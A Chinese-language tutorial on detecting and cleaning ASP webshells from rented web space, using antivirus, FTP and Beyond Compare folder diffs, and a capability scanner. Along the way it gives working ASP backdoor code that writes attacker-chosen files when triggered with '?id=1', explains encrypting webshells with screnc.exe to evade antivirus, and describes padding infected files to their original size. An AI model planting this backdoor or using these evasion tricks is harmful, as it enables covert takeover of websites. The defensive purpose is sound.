網上的一些防範asp***的教程都基於提前防範的基礎之上,例如:禁止FSO,利用NTFS限制用戶目錄等等。這些方法雖然有效,但是都是基於提前防範的,而且對於一般的買空間來做網站的朋友來說顯然不可能。我在這裏講講如何有效的發現web空間中的asp***並清除。
通過幫朋友整理web空間摸索出了一些技巧,這些技巧還挺管用,不敢獨享,拿出來共享。
一.技巧1:殺毒軟件查殺
一些朋友可能在成功得到上傳權限之後,上傳的asp***是一些非常有名的asp***,例如:cmdasp,海洋頂端***,這些***雖然功能強大,但是早已經被殺毒軟件列入了黑名單,所以利用殺毒軟件對web空間中的文件進行掃描,可以有效的發現並清除這些有名的asp***。這是我利用瑞星殺毒軟件在web目錄中查殺到的一個asp***,***標註爲:Script.ASP.Rootkit.10.a,在瑞星的網站上搜索一下,可以知道這就是海洋頂端***。
利用這種方法,可以有效的對抗一些小菜上傳的asp***,效果明顯。
二.技巧2:FTP客戶端對比
上面的方法雖然對菜鳥***者比較管用,但是遇到稍微有點意識的***者來說,幾乎失去效果,因爲他們完全可以對asp***進行僞裝,加密,使其躲藏殺毒軟件,這樣的手法比較多,我個人比較喜歡微軟開發個的一個asp加密小工具:screnc.exe,screnc.exe是一款ASP加密程序,加密的程式比較安全,使代碼完全改變,使用也非常簡單。只需要在命令下輸入:
screnc.exe,得到幫助命令:Usage: screnc [/?] [/s] [/f] [/xl] [/l ScriptLanguage] [/e DefaultExtension] 〈source〉 〈destination〉,根據提示,只需要輸入:screnc.exe 要加密的asp***名 輸出的asp***名,就可以完成加密僞裝。
經過加密之後,記事本打開查看,可以看到標籤:〈% ……%〉,〈script〉〈/script〉
等標籤內的代碼成爲一些“亂碼”,而殺毒軟件查殺asp***是通過搜索關鍵字來查殺,着阿姨能夠顯然就躲過查殺。
盛大官方網站被黑,掛的網頁***代碼就是利用screnc.exe來加密的,過了好幾天才被發現,可見加密僞裝手法的高超。
所以要採取另外的措施對付這種加密僞裝的asp***,我們可以利用一些FTP客戶端軟件(例如cuteftp,FlashFXP)提供的文件對比功能,通過對比FTP的中的web文件和本地的備份文件,發現是否錯出可疑文件。
這裏以FlashFXP進行操作講解。
步驟1:打開FlashFXP,在左邊窗口中跳轉到本地web備份文件目錄,在右邊的FTP窗口中跳轉到web目錄下。
步驟2:點工具欄中的“工具”,選擇其中的“比較文件夾命令”,即可進行對比文件夾,速度非常快。
我們可以清楚的看到196個對象被過濾,在FTP空間中多出了這樣幾個asp文件:.asp,2005.asp等,這十有八九就是***者留下的asp後門,打開確認一下即可。
三.技巧3:用Beyond Compare 2進行對比
上面的利用FTP客戶端對比文件的方法,雖然有效,但是遇到***入文件的asp***,那就無能爲力了,這裏介紹一款***性asp***,可以將代碼插入到指定web文件中,平常情況下不會顯示,只有使用觸發語句才能打開asp***,其隱蔽性非常高。代碼如下:
〈%
on error resume next
id=request("id")
if request("id")=1 then
testfile=Request.form("name")
msg=Request.form("message")
set fs=server.CreatObject("scripting.filesystemobject")
set thisfile=fs.openTestFile(testfile,8,True,0)
thisfile.Writeline(""&msg&"")
thisfile.close
set fs=nothing
%〉
〈from method="post" Action="保存"?id=1〉
〈input type="text" size="20" name="Name"
Value=〈%=server.mappath("XP.ASP")%〉〉
〈textarea name="Message" class=input〉
〈/textarea〉
〈input type="Submit" name="send" Value="生成"
class=input〉
〈/from〉
〈%end if%〉
注意:在修改目標主機的web文件時,要注意這樣的文件修改後沒有效果,即含有類似於:〈!--#include file="inc/conn.asp"--〉這樣的文件包含命令,這樣的代碼存在時,加入asp代碼後根本不會顯示出腳本後門,但是腳本後門代碼不會影響原文件的顯示和功能。
假如已經對目標服務器[url]www.target.com[/url]下的一個editor_InsertPic.asp文件進行了修改,插入了腳本後門代碼,那麼打開的方式是:www. target..com/editor_InsertPic.asp?id=1,注意後門的字符?id=1,有了這些字符,才能保證腳本後門顯示出來!普通情況下打開www. target..com/editor_InsertPic.asp?id=1,是不會露出破綻的。
這招真是asp***放置中非常狠的,如果遇到這樣的情況,該怎麼辦?我們可以利用一款專業的文件對比工具Beyond Compare 2來完成***的查找。
Beyond Compare 2一款不可多得的專業級的文件夾和文件對比工具。使用它可以很方便的對比出兩個文件夾或者文件的不同之處。並把相差的每一個字節用顏色加以表示,查看方便。並且支持多種規則對比。
看我來利用它完成***性asp***的查找。
步驟1:打開Beyond Compare 2,點工具欄中的“比較任務”,選擇其中的選項:新建,在“比較模式”中選擇“比較兩個文件夾”。進入一下步,選擇需要對比的兩個文件夾路徑,即備份過的網站文件以及從FTP上下載的網站文件,再在下面的“文件過濾器”中選擇“包括所有文件”。在“比較範圍”中選擇“文件大小”。設置完畢即可開始比較。
步驟2:比較完畢,軟件界面左右兩邊分別顯示了比較的結果,從中可以很容易找到哪個目錄多出了什麼文件。
步驟3:文件名相同,但是大小不同的文件,會被軟件用另外的顏色標註出來,選擇上它們,然後選擇工具欄的“操作”中的“比較內容”功能,即可展開兩個文件的詳細內容,從中我們可以看到FTP端的文件被插入了***asp***。這下很容易找到了吧!
四.技巧4:利用組件性能找asp***
上面分門別類的介紹了幾種asp***的放置與查殺技巧,一般的菜鳥,老鳥恐怕都是利用上面的方法來放置asp***吧!所以可以有效的對抗web空間中上傳的asp***。這下可以高枕無憂了吧?呵呵!先別急,還有一種BT的asp***放置方法,你可能很難想到,放置思路是這樣的:在目標web空間中尋找一個不常用的,比較合適的asp文件,打開它對其進行代碼精簡,然後再將***asp***的代碼插入,再對其進行精簡,直至與原本的文件大小一樣。最後利用加密僞裝的手法對其進行處理。這樣就徹底練就了一個絕對隱藏的asp***後門,一般的***者恐怕很難做到這一點,因爲要精簡代碼的同時還要保證asp***的功能不會錯誤。
如果你恰恰遇到一個這樣的***者,那麼該怎麼才能查出被他放置的asp***呢?你可能認爲這已經不太可能了,呵呵!完全可能,看我拿出寶貝來:思易asp***追捕。
它是一款專門檢索各種asp文件所帶功能的asp軟件,通過搜索asp***含有的特殊字符,以及搜索利用變量創建對象及靜態對象建立的代碼,來找出可能含有疑點的asp文件,從而有效的防範asp***。
使用非常簡單,只需要將文件asplist2.0.asp上傳到web空間下,然後在地址攔中打開,就完成了所有asp文件的檢索。可以看出它是通過查找各個asp文件的功能來確認是否爲asp***,這些功能也都是asp***常用的:FSO,WS,SHELL,XML等等。
一般的web文件很少具有這樣的功能,只有那些可惡的asp***才具有,可以看到一些文件具備了相當多的功能,這時候,就可以打開這些文件來確認是否是asp***,非常有效。
大家在查找web空間的asp***時,最好幾種方法結合起來,這樣就能有效的查殺被隱藏起來的asp***。